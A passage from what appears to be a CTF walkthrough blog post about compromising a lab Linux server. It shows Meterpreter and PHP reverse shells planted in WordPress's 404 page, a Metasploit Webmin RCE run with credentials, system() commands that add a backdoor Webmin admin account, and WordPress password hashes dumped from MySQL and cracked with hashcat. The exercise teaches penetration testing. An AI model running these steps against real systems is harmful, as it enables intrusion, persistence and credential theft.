Now, we’re ready to create the reverse shell session. To launch the session, we need to visit a page that doesn’t exist so that WordPress will redirect us to the 404.php page. If we did everything right, we should see our Meterpreter shell, as shown below.
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.10.2:4444 [*] Meterpreter session 5 opened (10.10.10.2:4444 -> 172.20.20.22:58058) at 2021-06-13 19:50:21 -0700 meterpreter >
As we’ve seen earlier, we can get root and interactive shell by issuing the commands below.
meterpreter > shell Process 22293 created. Channel 0 created. pwd /var/www/wordpress sudo bash -i bash: cannot set terminal process group (20044): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu-00:/var/www/wordpress#
Alternative PHP reverse shell
During the CTF event, the PHP reverse shell from pentestmonkey was the one I used. It was quick and easy. I didn’t need to know how to use Metasploit Framework by using this method.
The process to append the payload is the same as described above. However, we need to make sure that we change the address and port number in the PHP code before updating the file.
$ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS
In our case, we’ll change it to 10.10.10.2 and 4444. Once done, we need to go to the command line and use Netcat to launch a listener.
andrew@kali:~$ nc -lvp 4444 listening on [any] 4444 ...
Now, we’re ready to visit a page that doesn’t exist, just like we did earlier. If we did everything right, we should see something like the one below.
nc -lvp 4444
andrew@kali:~$ nc -lvp 4444 listening on [any] 4444 ... 172.20.20.22: inverse host lookup failed: Unknown host connect to [10.10.10.2] from (UNKNOWN) [172.20.20.22] 58054 Linux ubuntu-00 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 21:30:38 up 14:00, 1 user, load average: 0.07, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT administ pts/0 10.10.10.2 Tue17 10:49 0.48s 0.05s sshd: administrator [priv] uid=1000(administrator) gid=1000(administrator) groups=1000(administrator),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd) /bin/sh: 0: can't access tty; job control turned off $ sudo bash -i bash: cannot set terminal process group (20044): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu-00:/#
Webmin RCE method
Since we have a user and password pair, we’ll use that to exploit Webmin’s vulnerability. We’re going to use Metasploit again for this attack.
msf6 > use exploit/linux/http/webmin_packageup_rce
andrew@kali:~$ msfconsole -q msf6 > use exploit/linux/http/webmin_packageup_rce [*] Using configured payload cmd/unix/reverse_perl msf6 exploit(linux/http/webmin_packageup_rce) > set rhost 172.20.20.22 rhost => 172.20.20.22 msf6 exploit(linux/http/webmin_packageup_rce) > set username admin username => admin msf6 exploit(linux/http/webmin_packageup_rce) > set password littlewing!9 password => littlewing!9 msf6 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.10.2 lhost => 10.10.10.2 msf6 exploit(linux/http/webmin_packageup_rce) > set lport 4444 lport => 4444 msf6 exploit(linux/http/webmin_packageup_rce) > run [*] Started reverse TCP handler on 10.10.10.2:4444 [+] Session cookie: 3e9623f12e74caec130f3a8932aee065 [*] Attempting to execute the payload... [*] Command shell session 1 opened (10.10.10.2:4444 -> 172.20.20.22:58040) at 2021-06-13 23:48:32 -0700 pwd /home/administrator/webmin-1.910/package-updates sudo bash -i python3 -c 'import pty; pty.spawn("/bin/bash")' root@ubuntu-00:/home/administrator/webmin-1.910/package-updates#
In our previous attacks, the
sudo bash -i command worked to get a fully interactive shell. Since we couldn’t use that command, let’s use Python 2 or 3 to spawn a fully interactive shell.
No login credentials
If there were no login credentials, we could leverage the unauthenticated RCE to create login credentials to exploit the vulnerability. Follow the steps below to add a new user account, add permissions, change the password, and restart the Webmin service.
Change file permissions, so we can modify the file where Webmin stores login credentials.
system('sudo chmod 666 /etc/webmin/miniserv.users')
Create a new user and password pair.
system('echo andrew:\$1\$84720675\$F08uAAcIMcN8lZNg9D74p1:::::1584720675:::0:::: >> /etc/webmin/miniserv.users')
Add permissions to all modules.
system('echo "andrew: backup-config change-user webmincron usermin webminlog webmin help servers acl bacula-backup init passwd quota mount fsdump inittab jailkit ldap-client ldap-useradmin logrotate mailcap mon pam certmgr proc at cron sentry package-updates software man syslog syslog-ng system-status useradmin security-updates apache bind8 pserver dhcpd dhcp-dns dovecot exim fetchmail foobar frox jabber ldap-server majordomo htpasswd-file minecraft mysql openslp postfix postgresql proftpd procmail qmailadmin mailboxes sshd samba sendmail spam squid sarg wuftpd webalizer link adsl-client bandwidth fail2ban firewalld ipsec krb5 firewall firewall6 exports exports-nfs4 nis net xinetd inetd pap ppp-client pptp-client pptp-server stunnel shorewall shorewall6 itsecur-firewall tcpwrappers idmapd filter burner grub lilo raid lvm fdisk lpadmin smart-status time vgetty iscsi-client iscsi-server iscsi-tgtd iscsi-target cluster-passwd cluster-copy cluster-cron cluster-shell cluster-shutdown cluster-software cluster-usermin cluster-useradmin cluster-webmin cfengine heartbeat shell custom disk-usage export-test ftelnet filemin flashterm tunnel file phpini php-pear cpan htaccess-htpasswd ruby-gems telnet ssh ssh2 shellinabox status ajaxterm updown vnc dfsadmin ipfilter ipfw smf bsdexports bsdfdisk format hpuxexports rbac sgiexports zones dnsadmin" >> /etc/webmin/webmin.acl')
Change the password for the user that we created.
system('sudo /home/administrator/webmin-1.910/changepass.pl /etc/webmin andrew password')
Restart Webmin service.
If we did everything right, running the same exploit as above will yield the same results.
Since we have MySQL login credentials, we can use that to crack WordPress passwords. This section is unrelated to CTF, but I wanted to demonstrate the use of all credentials we’ve discovered.
Since we have shell access, we can log into MySQL by issuing the command below.
mysql -u root -p
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# mysql -u root -p Enter password: notroot Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 560 Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Let’s display the databases available.
mysql> show databases;
mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | sys | | wordpress | +--------------------+ 5 rows in set (0.04 sec)
Since we want WordPress, let’s choose that.
mysql> use wordpress;
mysql> use wordpress; use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed
Let’s display the tables in the database.
mysql> show tables;
mysql> show tables; show tables; +-----------------------------+ | Tables_in_wordpress | +-----------------------------+ | wp_bwg_album | | wp_bwg_album_gallery | | wp_bwg_gallery | | wp_bwg_image | | wp_bwg_image_comment | | wp_bwg_image_rate | | wp_bwg_image_tag | | wp_bwg_option | | wp_bwg_shortcode | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | | wp_wc_avatars_cache | | wp_wc_comments_subscription | | wp_wc_feedback_forms | | wp_wc_follow_users | | wp_wc_phrases | | wp_wc_users_rated | | wp_wc_users_voted | +-----------------------------+ 28 rows in set (0.01 sec)
We’re interested in the
wp_users table, so let’s dig further.
mysql> describe wp_users;
mysql> describe wp_users; describe wp_users; +---------------------+---------------------+------+-----+---------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +---------------------+---------------------+------+-----+---------------------+----------------+ | ID | bigint(20) unsigned | NO | PRI | NULL | auto_increment | | user_login | varchar(60) | NO | MUL | | | | user_pass | varchar(255) | NO | | | | | user_nicename | varchar(50) | NO | MUL | | | | user_email | varchar(100) | NO | MUL | | | | user_url | varchar(100) | NO | | | | | user_registered | datetime | NO | | 0000-00-00 00:00:00 | | | user_activation_key | varchar(255) | NO | | | | | user_status | int(11) | NO | | 0 | | | display_name | varchar(250) | NO | | | | +---------------------+---------------------+------+-----+---------------------+----------------+ 10 rows in set (0.00 sec)
Since we’re interested in the passwords, we’ll select the
mysql> SELECT ID, user_login, user_pass FROM wp_users;
mysql> SELECT ID, user_login, user_pass FROM wp_users; SELECT ID, user_login, user_pass FROM wp_users; +----+------------+------------------------------------+ | ID | user_login | user_pass | +----+------------+------------------------------------+ | 1 | admin | $P$By2JGSns1uOZ6WG8aI1otKigTWzme21 | | 2 | guest | $P$B1Vwz5gdMKoIc.OFZY.dbz2btpZh6X. | +----+------------+------------------------------------+ 2 rows in set (0.00 sec)
There’s no guarantee that we can crack this password, but we’re going to attempt anyway to see if it’s weak or not.
For this exercise, we’re going to use hashcat to crack the password. I typically use RockYou wordlist with hashcat, so we’ll use that.
hashcat -m 400 -a 0 ‘$P$By2JGSns1uOZ6WG8aI1otKigTWzme21’ /usr/share/wordlists/rockyou.txt
andrew@kali:~$ hashcat -m 400 -a 0 '$P$By2JGSns1uOZ6WG8aI1otKigTWzme21' /usr/share/wordlists/rockyou.txt hashcat (v6.1.1) starting... OpenCL API (OpenCL 1.2 (May 8 2021 03:14:28)) - Platform #1 [Apple] ==================================================================== * Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped * Device #2: Intel(R) HD Graphics 530, 1472/1536 MB (384 MB allocatable), 24MCU * Device #3: AMD Radeon Pro 460 Compute Engine, 4032/4096 MB (1024 MB allocatable), 16MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers applied: * Zero-Byte * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 461 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921512 * Keyspace..: 14344385 $P$By2JGSns1uOZ6WG8aI1otKigTWzme21:admin Session..........: hashcat Status...........: Cracked Hash.Name........: phpass Hash.Target......: $P$By2JGSns1uOZ6WG8aI1otKigTWzme21 Time.Started.....: Fri Jun 13 13:16:04 2021 (1 sec) Time.Estimated...: Fri Jun 13 13:16:05 2021 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#2.........: 17885 H/s (6.60ms) @ Accel:96 Loops:64 Thr:8 Vec:1 Speed.#3.........: 200.7 kH/s (9.42ms) @ Accel:128 Loops:128 Thr:64 Vec:1 Speed.#*.........: 218.6 kH/s Recovered........: 1/1 (100.00%) Digests Progress.........: 131072/14344385 (0.91%) Rejected.........: 0/131072 (0.00%) Restore.Point....: 0/14344385 (0.00%) Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:5504-5568 Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:8064-8192 Candidates.#2....: 123456 -> sweetgurl Candidates.#3....: sunshine13 -> gerben Started: Fri Jun 13 13:15:42 2021 Stopped: Fri Jun 13 13:16:07 2021
We’ve covered enough attacks in this article, and I think we should get back to the CTF and find the ransomware key.
According to the mission section, Kaos Corp transmitted the key from one of the Linux servers. Since this is a Linux server, let’s check things out to see if they left any clues for us.
In the unauthenticated RCE section, you may have noticed that they created an account with a username of kaos-corp to maintain access to the system. We can check the home directory to see if there’s something of value there.
ls -al /home/kaos-corp/
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# ls -al /home/kaos-corp/ total 44 drwxr-xr-x 6 kaos-corp kaos-corp 4096 Oct 14 2020 . drwxr-xr-x 6 root root 4096 Oct 16 2020 .. -rw------- 1 root root 5 Oct 14 2020 .bash_history -rw-r--r-- 1 kaos-corp kaos-corp 220 Oct 14 2020 .bash_logout -rw-r--r-- 1 kaos-corp kaos-corp 3771 Oct 14 2020 .bashrc drwx------ 2 kaos-corp kaos-corp 4096 Oct 14 2020 .cache drwx------ 3 kaos-corp kaos-corp 4096 Oct 14 2020 .gnupg drwxrwxr-x 3 kaos-corp kaos-corp 4096 Oct 14 2020 .local -rw-r--r-- 1 kaos-corp kaos-corp 807 Oct 14 2020 .profile -rw-rw-r-- 1 kaos-corp kaos-corp 66 Oct 14 2020 .selected_editor -rw-r--r-- 1 kaos-corp kaos-corp 0 Oct 14 2020 .sudo_as_admin_successful drwxrwxr-x 2 kaos-corp kaos-corp 4096 Oct 14 2020 .tmp
Not much is there, so I decided to look at the other users’ home directories but didn’t find anything. That means we need to keep digging.
Instead of going through every directory, let’s search for files created by the kaos-corp user.
find / -user kaos-corp
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# find / -user kaos-corp /home/kaos-corp /home/kaos-corp/.bashrc /home/kaos-corp/.gnupg /home/kaos-corp/.gnupg/private-keys-v1.d /home/kaos-corp/.cache /home/kaos-corp/.cache/motd.legal-displayed /home/kaos-corp/.sudo_as_admin_successful /home/kaos-corp/.local /home/kaos-corp/.local/share /home/kaos-corp/.local/share/nano /home/kaos-corp/.bash_logout /home/kaos-corp/.selected_editor /home/kaos-corp/.tmp /home/kaos-corp/.profile /var/spool/cron/crontabs/kaos-corp /proc/20899 /proc/20899/task /proc/20899/task/20899 /proc/20899/task/20899/fd /proc/20899/task/20899/fd/0 /proc/20899/task/20899/fd/1 /proc/20899/task/20899/fd/2 /proc/20899/task/20899/fd/255 /proc/20899/task/20899/fdinfo /proc/20899/task/20899/fdinfo/0 /proc/20899/task/20899/fdinfo/1 /proc/20899/task/20899/fdinfo/2 /proc/20899/task/20899/fdinfo/255 /proc/20899/task/20899/ns /proc/20899/task/20899/ns/net /proc/20899/task/20899/ns/uts /proc/20899/task/20899/ns/ipc /proc/20899/task/20899/ns/pid /proc/20899/task/20899/ns/pid_for_children /proc/20899/task/20899/ns/user /proc/20899/task/20899/ns/mnt /proc/20899/task/20899/ns/cgroup /proc/20899/task/20899/net /proc/20899/task/20899/environ /proc/20899/task/20899/auxv /proc/20899/task/20899/status /proc/20899/task/20899/personality /proc/20899/task/20899/limits /proc/20899/task/20899/sched /proc/20899/task/20899/comm /proc/20899/task/20899/syscall /proc/20899/task/20899/cmdline /proc/20899/task/20899/stat /proc/20899/task/20899/statm /proc/20899/task/20899/maps /proc/20899/task/20899/children /proc/20899/task/20899/numa_maps /proc/20899/task/20899/mem /proc/20899/task/20899/cwd /proc/20899/task/20899/root /proc/20899/task/20899/exe /proc/20899/task/20899/mounts /proc/20899/task/20899/mountinfo /proc/20899/task/20899/clear_refs /proc/20899/task/20899/smaps /proc/20899/task/20899/smaps_rollup /proc/20899/task/20899/pagemap /proc/20899/task/20899/attr /proc/20899/task/20899/attr/current /proc/20899/task/20899/attr/prev /proc/20899/task/20899/attr/exec /proc/20899/task/20899/attr/fscreate /proc/20899/task/20899/attr/keycreate /proc/20899/task/20899/attr/sockcreate /proc/20899/task/20899/attr/display_lsm /proc/20899/task/20899/attr/selinux /proc/20899/task/20899/attr/selinux/current /proc/20899/task/20899/attr/selinux/prev /proc/20899/task/20899/attr/selinux/exec /proc/20899/task/20899/attr/selinux/fscreate /proc/20899/task/20899/attr/selinux/keycreate /proc/20899/task/20899/attr/selinux/sockcreate /proc/20899/task/20899/attr/smack /proc/20899/task/20899/attr/smack/current /proc/20899/task/20899/attr/apparmor /proc/20899/task/20899/attr/apparmor/current /proc/20899/task/20899/attr/apparmor/prev /proc/20899/task/20899/attr/apparmor/exec /proc/20899/task/20899/wchan /proc/20899/task/20899/stack /proc/20899/task/20899/schedstat /proc/20899/task/20899/cpuset /proc/20899/task/20899/cgroup /proc/20899/task/20899/oom_score /proc/20899/task/20899/oom_adj /proc/20899/task/20899/oom_score_adj /proc/20899/task/20899/loginuid /proc/20899/task/20899/sessionid /proc/20899/task/20899/io /proc/20899/task/20899/uid_map /proc/20899/task/20899/gid_map /proc/20899/task/20899/projid_map /proc/20899/task/20899/setgroups /proc/20899/task/20899/patch_state /proc/20899/fd /proc/20899/fd/0 /proc/20899/fd/1 /proc/20899/fd/2 /proc/20899/fd/255 /proc/20899/map_files /proc/20899/map_files/5600c4057000-5600c415b000 /proc/20899/map_files/5600c435a000-5600c435e000 /proc/20899/map_files/5600c435e000-5600c4367000 /proc/20899/map_files/7fbe0a776000-7fbe0a781000 /proc/20899/map_files/7fbe0a781000-7fbe0a980000 /proc/20899/map_files/7fbe0a980000-7fbe0a981000 /proc/20899/map_files/7fbe0a981000-7fbe0a982000 /proc/20899/map_files/7fbe0a988000-7fbe0a99f000 /proc/20899/map_files/7fbe0a99f000-7fbe0ab9e000 /proc/20899/map_files/7fbe0ab9e000-7fbe0ab9f000 /proc/20899/map_files/7fbe0ab9f000-7fbe0aba0000 /proc/20899/map_files/7fbe0aba2000-7fbe0abad000 /proc/20899/map_files/7fbe0abad000-7fbe0adac000 /proc/20899/map_files/7fbe0adac000-7fbe0adad000 /proc/20899/map_files/7fbe0adad000-7fbe0adae000 /proc/20899/map_files/7fbe0adae000-7fbe0adb6000 /proc/20899/map_files/7fbe0adb6000-7fbe0afb6000 /proc/20899/map_files/7fbe0afb6000-7fbe0afb7000 /proc/20899/map_files/7fbe0afb7000-7fbe0afb8000 /proc/20899/map_files/7fbe0afb8000-7fbe0b19f000 /proc/20899/map_files/7fbe0b19f000-7fbe0b39f000 /proc/20899/map_files/7fbe0b39f000-7fbe0b3a3000 /proc/20899/map_files/7fbe0b3a3000-7fbe0b3a5000 /proc/20899/map_files/7fbe0b3a9000-7fbe0b3ac000 /proc/20899/map_files/7fbe0b3ac000-7fbe0b5ab000 /proc/20899/map_files/7fbe0b5ab000-7fbe0b5ac000 /proc/20899/map_files/7fbe0b5ac000-7fbe0b5ad000 /proc/20899/map_files/7fbe0b5ad000-7fbe0b5d2000 /proc/20899/map_files/7fbe0b5d2000-7fbe0b7d2000 /proc/20899/map_files/7fbe0b7d2000-7fbe0b7d6000 /proc/20899/map_files/7fbe0b7d6000-7fbe0b7d7000 /proc/20899/map_files/7fbe0b7d7000-7fbe0b7fe000 /proc/20899/map_files/7fbe0b856000-7fbe0b9f1000 /proc/20899/map_files/7fbe0b9f7000-7fbe0b9fe000 /proc/20899/map_files/7fbe0b9fe000-7fbe0b9ff000 /proc/20899/map_files/7fbe0b9ff000-7fbe0ba00000 /proc/20899/fdinfo /proc/20899/fdinfo/0 /proc/20899/fdinfo/1 /proc/20899/fdinfo/2 /proc/20899/fdinfo/255 /proc/20899/ns /proc/20899/ns/net /proc/20899/ns/uts /proc/20899/ns/ipc /proc/20899/ns/pid /proc/20899/ns/pid_for_children /proc/20899/ns/user /proc/20899/ns/mnt /proc/20899/ns/cgroup /proc/20899/net /proc/20899/environ /proc/20899/auxv /proc/20899/status /proc/20899/personality /proc/20899/limits /proc/20899/sched /proc/20899/autogroup /proc/20899/comm /proc/20899/syscall /proc/20899/cmdline /proc/20899/stat /proc/20899/statm /proc/20899/maps /proc/20899/numa_maps /proc/20899/mem /proc/20899/cwd /proc/20899/root /proc/20899/exe /proc/20899/mounts /proc/20899/mountinfo /proc/20899/mountstats /proc/20899/clear_refs /proc/20899/smaps /proc/20899/smaps_rollup /proc/20899/pagemap /proc/20899/attr /proc/20899/attr/current /proc/20899/attr/prev /proc/20899/attr/exec /proc/20899/attr/fscreate /proc/20899/attr/keycreate /proc/20899/attr/sockcreate /proc/20899/attr/display_lsm /proc/20899/attr/selinux /proc/20899/attr/selinux/current /proc/20899/attr/selinux/prev /proc/20899/attr/selinux/exec /proc/20899/attr/selinux/fscreate /proc/20899/attr/selinux/keycreate /proc/20899/attr/selinux/sockcreate /proc/20899/attr/smack /proc/20899/attr/smack/current /proc/20899/attr/apparmor /proc/20899/attr/apparmor/current /proc/20899/attr/apparmor/prev /proc/20899/attr/apparmor/exec /proc/20899/wchan /proc/20899/stack /proc/20899/schedstat /proc/20899/cpuset /proc/20899/cgroup /proc/20899/oom_score /proc/20899/oom_adj /proc/20899/oom_score_adj /proc/20899/loginuid /proc/20899/sessionid /proc/20899/coredump_filter /proc/20899/io /proc/20899/uid_map /proc/20899/gid_map /proc/20899/projid_map /proc/20899/setgroups /proc/20899/timers /proc/20899/timerslack_ns /proc/20899/patch_state find: ‘/proc/22045/task/22045/net’: Invalid argument find: ‘/proc/22045/net’: Invalid argument find: ‘/proc/22303/task/22303/fd/6’: No such file or directory find: ‘/proc/22303/task/22303/fdinfo/6’: No such file or directory find: ‘/proc/22303/fd/5’: No such file or directory find: ‘/proc/22303/fdinfo/5’: No such file or directory /etc/memcache /etc/memcache/.conf /etc/memcache/.conf/sync-2021-06-14-07-20-01.jpg /etc/memcache/update.sh /etc/memcache/memcached.conf
Since steganography is something CTF creators love to include, let’s take a look at that. The
strings command is the first tool that I use when inspecting an image or binary file.
root@ubuntu-00:/home/administrator/webmin-1.910/package-updates# strings -n 10 /etc/memcache/.conf/sync-2021-06-14-07-20-01.jpg ;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90 %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz EPc'?0=0zTd J?u$S1vE=?v key-rachet-algo-23028: as32.whisper-cold-knowledge-feather key-rachet-algo-23029: as32.cowboy-quad-powder-solidify
I decided to test the first key in the CTF portal, and it worked. We’ll use this key to decrypt the VeraCrypt Vault once we figure out which of the remaining hosts is the Windows AD controller.
From a CTF perspective, exploiting one vulnerability is often enough to get the flag. However, in a real-world engagement, you want to leave no stone unturned. In this article, we’ve exploited several security vulnerabilities to simulate a penetration testing engagement.
In the next one, we are going to explore the other hosts. We will attempt to exploit as many vulnerabilities as possible, just like what we did here.
BUY ME COFFEE ☕